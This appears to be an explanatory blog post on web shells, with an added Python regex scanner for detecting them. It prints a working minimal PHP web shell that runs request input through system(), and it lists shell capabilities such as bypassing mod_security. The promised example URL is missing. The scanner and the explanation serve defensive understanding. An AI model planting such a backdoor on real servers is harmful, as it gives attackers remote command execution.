What are the Webshells : Think like Elit


web shells

Web shells are programs or scripts written in PHP, Perl, Python and many other scripting languages. They can be uploaded to a server and used to provide a web-based interface for running commands on it. Web shells basically work like backdoors that can be run from any browser.
Web servers have become one of the main targets of malicious activity and are often a weak point within an organization’s infrastructure. Web shell code is often deployed and forgotten or unmaintained by an organization, creating weak points which are vulnerable to attack. The web shell script must be in the same language that the web server supports or is running (PHP, ASP, JSP etc.). So if it's a PHP web server, then you need a PHP web shell. Web shells run purely over the web, so there is no socket communication as in the case of reverse shells, where the web server has to connect to a program like netcat on the hacker’s machine. Therefore web shells are quick to set up and use. Web shells can be defined as an undocumented way to gain console access to a computer system through a dynamic server-side web page. Traditionally these web shells were simple and easy to detect.

For example, let’s take the following PHP file:

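<?php
// Run only when the request carries a "cmd" parameter.
if (isset($_REQUEST['cmd']))
{
echo "";
// Request input is passed to the system shell unchanged.
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "";
die;
}
?>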


This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:

Web shells provide a quick GUI interface to do common tasks like:

1) Travel across directories
2) View files
3) Edit files
4) Download files
5) Delete files
6) Edit files
7) Upload files
8) Execute MySQL queries / commands
9) Bypass mod_security
10) Permissions to directory/folders
11) Execute shell commands
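
The simple PHP shell shown earlier is easy to detect because request input reaches system() almost directly. The following scanner is an added example, not code from the original post: it flags PHP source in which a request superglobal, or a variable assigned from one, is passed to a command-execution function. The names find_request_to_exec and is_tainted and the sample strings are assumptions of this sketch; it is a regex heuristic and will not catch obfuscated shells.

```python
import re

# PHP functions that hand a string to the operating system shell.
EXEC_FUNCS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open")
# Superglobals that carry client-controlled request data.
REQUEST_SRC = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[")
# "$var = expr;" (the lookahead skips "==" comparisons).
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*([^;]*);")
# Plain function calls only: "->exec(", "::exec(" and "curl_exec(" are skipped.
CALL = re.compile(r"(?<![\w>:$])(%s)\s*\(([^;]*)\)\s*;" % "|".join(EXEC_FUNCS))


def is_tainted(expr, tainted):
    """True if expr reads request data directly or via a tainted variable."""
    if REQUEST_SRC.search(expr):
        return True
    return any(re.search(re.escape(v) + r"\b", expr) for v in tainted)


def find_request_to_exec(php_source):
    """Return (line, function, argument) for each exec call fed by request data."""
    tainted = set()
    for m in ASSIGN.finditer(php_source):
        if is_tainted(m.group(2), tainted):
            tainted.add(m.group(1))
    findings = []
    for m in CALL.finditer(php_source):
        if is_tainted(m.group(2), tainted):
            line = php_source.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1), m.group(2).strip()))
    return findings


# Constructed samples: the page's shell, and a benign script with a fixed command.
PAGE_SHELL = """<?php
if (isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>"""
BENIGN = """<?php
system("uptime");
$rows = $db->exec($query);
?>"""

if __name__ == "__main__":
    for name, src in (("page shell", PAGE_SHELL), ("benign", BENIGN)):
        print(name, find_request_to_exec(src))
```

To scan a web root, read each .php file as text and pass its contents to find_request_to_exec; any non-empty result is a file to review by hand.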